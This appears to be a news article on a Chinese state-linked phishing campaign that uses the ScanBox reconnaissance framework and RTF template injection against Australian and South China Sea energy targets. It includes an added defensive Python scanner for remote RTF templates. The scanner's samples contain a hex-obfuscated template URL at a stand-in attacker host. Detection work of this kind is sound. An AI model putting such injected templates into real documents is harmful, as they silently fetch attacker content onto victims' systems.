Chinese Phishing Campaign Targets Victims in South China Sea
Campaign Uses ScanBox Framework and RTF Template Injection
Chinese intelligence threat actors are conducting cyberespionage campaigns targeting the Australian government and corporations involved with energy extraction in the South China Sea, researchers say.
The campaign's latest guise is posing as Australian online media in a bid to get victims to enable a web reconnaissance and exploitation framework dubbed ScanBox that is likely used by multiple China-based threat actors, concludes a joint report from Proofpoint and PricewaterhouseCoopers.
The two companies assess with moderate confidence the campaign, which Proofpoint began to observe in March 2021, is the work of the threat actor known as TA423 or Red Ladon. Its activities overlap with a threat actor dubbed APT40 or Leviathan.
A 2021 indictment of Chinese hackers by the U.S. Department of Justice attributed the threat actors to the Ministry of State Security of the southern Chinese province of Hainan. Proofpoint and PwC researchers say that one of TA423’s longest running areas of responsibility is assessed to include the South China Sea (see: US Indicts 4 Chinese Nationals for Lengthy Hacking Campaign).
The phishing campaign is one sign of South China Sea regional tensions, where Beijing aggressively presses disputed territorial claims. "There is a clear and upward trend of PRC provocations against South China Sea claimants and other states lawfully operating in the region," a U.S. Department of State official told a Washington think tank audience, Reuters reported earlier this summer.
TA423 supports "the Chinese government in matters related to the South China Sea, including during the recent tensions in Taiwan," says Sherrod DeGrippo, Proofpoint vice president of threat research and detection, referring to Chinese objections to a Taipei visit by U.S. House Speaker Nancy Pelosi earlier this month.
"This group specifically wants to know who is active in the region and while we can't say for certain, their focus on naval issues is likely to remain a constant priority in places like Malaysia, Singapore, Taiwan and Australia," DeGrippo says.
Among the phishing campaign's targets are organizations connected with exploitation of the Kasawari offshore gas field in Malaysia's exclusive economic zone and an offshore wind farm in the Taiwan Strait.
Attack Techniques
ScanBox is a PHP- and JavaScript-based reconnaissance framework first identified in 2014. In its most recent phase, the Chinese intelligence campaign uses links in phishing emails that direct victims to a malicious website that purports to be an Australian news media outlet.
In the latest campaign, detected in April and extending through June, threat actors targeted local and federal Australian governmental agencies, news media companies and global heavy industry manufacturers that conduct maintenance of fleets of wind turbines in the South China Sea.
These phishing campaigns originated from Gmail and Outlook email addresses. Frequently, the threat actor posed as an employee of the fictional media publication "Australian Morning News." The associated web domain contained content copied from legitimate news publications, including the BBC and Sky News.
Once the victim is redirected to the malicious site, they are served with the ScanBox framework. In the past, threat actors delivered a single block of JavaScript code but more recently have opted for a plug-in-based, modular architecture, researchers say.
The modularity is a bid to prevent crashes or errors that might tip off the owners of compromised websites, researchers say.
This modular architecture executes a main JavaScript payload and then loads additional modules to profile the victim. Once ScanBox is set up successfully, it connects to a command-and-control server operated by the threat actors.
Researchers say that the initial script harvests data that helps set up the following stages of information gathering and potential follow-on exploitation or compromise.
The capabilities of the initial ScanBox JavaScript executed in victims' browsers include checking if the victim's browser is Safari or Internet Explorer, verifying whether the command-and-control server is responding and sending information about the victim's browser, including the operating system and language.
RTF Template Injection
In an earlier campaign observed in March, the phishing emails carried Rich Text Format template injection attachments that used template URLs customized for each target.
RTF template injection is a technique in which an RTF file containing decoy content is altered so that, when the file is opened, it retrieves content hosted at an external URL. Because the template mechanism is compatible with Microsoft Office, users can open or edit these documents without friction, giving attackers a way to attack any system on which the document is opened.
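As an added defensive example (not code from the Proofpoint/PwC report), the following Python scanner flags RTF files whose template destination points to a remote location, which is the pattern described above; the sample RTF documents and the URLs in them are constructed placeholders.

```python
"""Flag RTF documents whose \\*\\template destination points to a remote
location (the RTF template-injection pattern). Added defensive example,
not Proofpoint/PwC code; the sample documents below are constructed."""
import re

# The template destination: '{\*' (ignorable-destination marker), optional
# whitespace, '\template', then the target text up to the closing brace.
TEMPLATE_RE = re.compile(rb"\{\\\*\s*\\template\b([^}]*)\}", re.IGNORECASE)
# RTF \'hh hex escapes, a common way to hide the URL from naive string searches.
HEX_ESCAPE_RE = re.compile(rb"\\'([0-9a-fA-F]{2})")
REMOTE_PREFIXES = ("http://", "https://", "ftp://", "file://", "\\\\")


def decode_rtf_text(raw: bytes) -> str:
    """Undo \\'hh hex escapes and strip surrounding whitespace."""
    raw = HEX_ESCAPE_RE.sub(lambda m: bytes.fromhex(m.group(1).decode()), raw)
    return raw.decode("latin-1").strip()


def find_template_targets(rtf: bytes) -> list:
    """Return every template target string found in the document."""
    return [decode_rtf_text(m.group(1)) for m in TEMPLATE_RE.finditer(rtf)]


def is_remote_template(target: str) -> bool:
    """A template fetched over HTTP/FTP/UNC is the injection indicator."""
    return target.lower().startswith(REMOTE_PREFIXES)


def scan_rtf(rtf: bytes) -> dict:
    targets = find_template_targets(rtf)
    remote = [t for t in targets if is_remote_template(t)]
    return {"templates": targets, "remote": remote, "suspicious": bool(remote)}


# Constructed samples: a plain injected URL (with a per-victim tracking id,
# as the article describes), a hex-obfuscated one, and a benign local template.
SAMPLE_RTF = (
    rb"{\rtf1\ansi\deff0{\fonttbl{\f0 Times New Roman;}}"
    rb"{\*\template http://template.example.invalid/track?id=1234}"
    rb"\f0\fs24 Decoy content about regional energy projects.\par}"
)
OBFUSCATED_RTF = (
    rb"{\rtf1\ansi{\* \template \'68\'74\'74\'70://evil.example.invalid/t.dotm}\par}"
)
BENIGN_RTF = rb"{\rtf1\ansi{\*\template C:\Users\me\Templates\normal.dotm}\par}"

if __name__ == "__main__":
    for name, doc in [("sample", SAMPLE_RTF), ("obfuscated", OBFUSCATED_RTF), ("benign", BENIGN_RTF)]:
        print(name, scan_rtf(doc))
```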
Although the campaign returned the same payload to all the victims, the URLs used were distinct. Each of them had a victim ID number that correlated to the intended victims and allowed attackers to track active infections.
"Notably, the recurring use of custom URLs that are unique to each victim, likely for infection tracking purposes, is a commonality to the ScanBox phishing URLs observed later in April 2022," researchers say.
One of the targets of the RTF campaign was a European manufacturer of heavy equipment used in building the Yunlin Offshore Wind Farm in the Taiwan Strait.